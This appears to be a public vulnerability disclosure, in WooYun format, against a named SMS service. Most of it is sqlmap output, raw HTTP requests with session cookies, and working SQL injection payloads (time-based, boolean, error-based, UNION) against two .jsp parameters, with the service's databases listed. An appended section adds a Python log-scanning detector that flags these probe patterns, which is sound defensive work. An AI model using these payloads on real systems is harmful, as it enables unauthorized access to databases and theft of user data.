2015-07-14: Details have been reported to the vendor and are awaiting vendor handling.
2015-07-19: The vendor has actively ignored the vulnerability; details are now disclosed to the public.
As the title says.
Injection point 1:
GET /user_findloginuser.jsp?loginuser=admin HTTP/1.1
Host: sms.iddsms.com
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.1.2238.18 Safari/537.36
Accept: */*
Referer: http://sms.iddsms.com/fgpaswd.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=EB7432D3B39E5A8AADFF7DE31F54460A
GET parameter 'loginuser' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 93 HTTP(s) requests:
---
Parameter: loginuser (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: loginuser=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))RKKk) AND 'qxiH'='qxiH
---
[14:49:52] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.12
[14:49:52] [INFO] fetching database names
[14:49:52] [INFO] fetching number of databases
[14:49:52] [INFO] retrieved:
[14:49:52] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
2
[14:50:09] [INFO] retrieved:
[14:50:14] [INFO] adjusting time delay to 4 seconds due to good response times
[14:50:34] [ERROR] invalid character detected. retrying..
[14:50:34] [WARNING] increasing time delay to 5 seconds
[14:50:55] [ERROR] invalid character detected. retrying..
[14:50:55] [WARNING] increasing time delay to 6 seconds
information_schema
[14:59:32] [INFO] retrieved: w
[15:00:31] [ERROR] invalid character detected. retrying..
[15:00:31] [WARNING] increasing time delay to 7 seconds
ebsm
[15:03:08] [ERROR] invalid character detected. retrying..
[15:03:08] [WARNING] increasing time delay to 8 seconds
s
[15:04:35] [ERROR] invalid character detected. retrying..
[15:04:35] [WARNING] increasing time delay to 9 seconds
s
available databases [2]:
[*] information_schema
[*] websmss
[15:05:18] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\sms.iddsms.com'
Injection point 2:
GET /manager/base/tailmt.jsp?seqid=1262236 HTTP/1.1
Host: sms.iddsms.com
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.1.2238.18 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=EB7432D3B39E5A8AADFF7DE31F54460A
sqlmap identified the following injection points with a total of 43 HTTP(s) requests:
---
Parameter: seqid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: seqid=1262236' AND 9000=9000 AND 'zfLF'='zfLF

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: seqid=1262236' AND (SELECT 5252 FROM(SELECT COUNT(*),CONCAT(0x7162717871,(SELECT (ELT(5252=5252,1))),0x71627a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'bYNj'='bYNj

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: seqid=1262236' AND (SELECT * FROM (SELECT(SLEEP(5)))WYNu) AND 'uALS'='uALS

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: seqid=-2842' UNION ALL SELECT CONCAT(0x7162717871,0x4362637344627a52594b,0x71627a6271)-- 
---
[15:00:48] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
[15:00:48] [INFO] fetching database names
[15:00:48] [INFO] the SQL query used returns 2 entries
[15:00:49] [INFO] retrieved: information_schema
[15:00:49] [INFO] retrieved: websmss
available databases [2]:
[*] information_schema
[*] websmss
[15:00:50] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\sms.iddsms.com'
[*] shutting down at 15:00:50
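From the defender's side, the two sqlmap runs above leave a characteristic trail in the web server's access log: a quoted-string break followed by a numeric tautology (boolean-based), a SLEEP() subquery whose request takes several seconds longer than its neighbours (time-based), a FLOOR(RAND(0)*2) ... GROUP BY construct (error-based), and a UNION ALL SELECT (union). The script below is an added example, not part of the WooYun report and not code from the vendor: it parses constructed access-log lines in combined log format with one extra trailing field (response time in milliseconds, an assumption about the server's log configuration), decodes each query parameter, and tags the probes it recognises, marking a SLEEP() probe as delay-confirmed when the server really did stall. The IPs, timestamps and response times are made up; the payloads mirror the ones sqlmap reported against the two .jsp endpoints.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample log lines (combined log format + response time in ms as the
# last field). Addresses, timestamps, sizes and timings are invented; the query
# strings reproduce the probes that sqlmap reported in this write-up.
SAMPLE_LOG = """\
203.0.113.5 - - [14/Jul/2015:14:49:10 +0800] "GET /user_findloginuser.jsp?loginuser=admin HTTP/1.1" 200 512 120
203.0.113.5 - - [14/Jul/2015:14:49:52 +0800] "GET /user_findloginuser.jsp?loginuser=admin%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29RKKk%29%20AND%20%27qxiH%27%3D%27qxiH HTTP/1.1" 200 512 5130
203.0.113.5 - - [14/Jul/2015:15:00:40 +0800] "GET /manager/base/tailmt.jsp?seqid=1262236%27%20AND%209000%3D9000%20AND%20%27zfLF%27%3D%27zfLF HTTP/1.1" 200 2048 95
203.0.113.5 - - [14/Jul/2015:15:00:45 +0800] "GET /manager/base/tailmt.jsp?seqid=-2842%27%20UNION%20ALL%20SELECT%20CONCAT%280x7162717871%2C0x4362637344627a52594b%2C0x71627a6271%29--%20 HTTP/1.1" 200 2100 88
198.51.100.9 - - [14/Jul/2015:15:01:00 +0800] "GET /manager/base/tailmt.jsp?seqid=1262237 HTTP/1.1" 200 2048 90
"""

# Combined log format with an appended response-time field (assumed layout).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) (?P<ms>\d+)$'
)

# One signature per technique seen in the sqlmap output above. sqlmap's closing
# tautology ('x'='x) appears on every quoted payload, so it is deliberately not
# used as a discriminator; the boolean signature looks for the numeric n=n form.
SIGNATURES = {
    "time-based": re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I),
    "union": re.compile(r"\bUNION\b(?:\s+ALL)?\s+SELECT\b", re.I),
    "boolean": re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I),
    "error-based": re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
}


def classify_value(value):
    """Return the names of every technique whose signature matches a decoded parameter value."""
    return [name for name, rx in SIGNATURES.items() if rx.search(value)]


def analyze_log(text, slow_ms=4000):
    """Scan access-log text; return one finding per (request, parameter) that looks like an injection probe."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unexpected format: skip the line rather than abort the scan
        target = m.group("target")
        parts = urlsplit(target)
        # parse_qsl percent-decodes values, so %27 / %20 / %3D become ' space =
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            techniques = classify_value(value)
            # A SLEEP() payload that really stalled the response is strong evidence
            # the database executed it, not merely that someone sent it.
            if "time-based" in techniques and int(m.group("ms")) >= slow_ms:
                techniques.append("delay-confirmed")
            if techniques:
                findings.append({
                    "ip": m.group("ip"),
                    "path": parts.path,
                    "param": name,
                    "techniques": techniques,
                    "ms": int(m.group("ms")),
                })
    return findings


if __name__ == "__main__":
    for f in analyze_log(SAMPLE_LOG):
        print(f["ip"], f["path"], f["param"], ",".join(f["techniques"]), f"{f['ms']}ms")
```

The delay threshold is the interesting design choice: sqlmap starts at a 5-second SLEEP and, as the log above shows, raises it when responses are noisy, so a threshold a little under the initial delay catches the probes while a plain latency spike on the same endpoint (no SLEEP in the query) is never flagged on its own. Running the scan per source IP and counting distinct techniques gives a cheap way to separate a full sqlmap session from a single stray request.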
Severity: No impact (vendor ignored)
Ignored at: 2015-07-19 16:10
Vulnerability Rank: 4 (WooYun rating)
None yet.